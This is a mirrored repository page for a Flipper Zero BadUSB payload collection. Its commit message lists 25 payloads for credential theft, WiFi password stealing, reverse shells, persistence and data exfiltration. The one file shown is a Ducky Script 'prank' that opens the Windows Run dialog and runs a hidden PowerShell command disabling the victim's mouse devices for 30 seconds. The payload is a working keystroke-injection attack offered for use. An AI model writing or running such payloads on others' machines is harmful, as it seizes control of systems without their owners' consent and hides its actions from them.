mirror of
https://github.com/UberGuidoZ/Flipper.git
synced 2026-09-17 07:13:18 +00:00
4f61dec96b
Added 25 BadUSB payloads for Flipper Zero: - System reconnaissance (Windows/Linux/Mac) - Credential extraction & WiFi password stealing - Reverse shells (PowerShell & Bash) - Defense evasion & persistence - Data exfiltration (keylogger, webcam, clipboard) - Harmless pranks All payloads include proper headers and documentation. Cross-platform support for Windows, Linux, and macOS.
11 lines
396 B
Plaintext
11 lines
396 B
Plaintext
REM ========================================
|
|
REM NullSec Flipper Zero BadUSB
|
|
REM Payload: Disable Mouse/Keyboard Prank
|
|
REM Target: Windows 10/11
|
|
REM ========================================
|
|
DELAY 1000
|
|
GUI r
|
|
DELAY 500
|
|
STRING powershell -w hidden -c "$d=Get-PnpDevice|Where-Object{$_.Class -eq 'Mouse'};$d|Disable-PnpDevice -Confirm:$false;Start-Sleep 30;$d|Enable-PnpDevice -Confirm:$false"
|
|
ENTER
|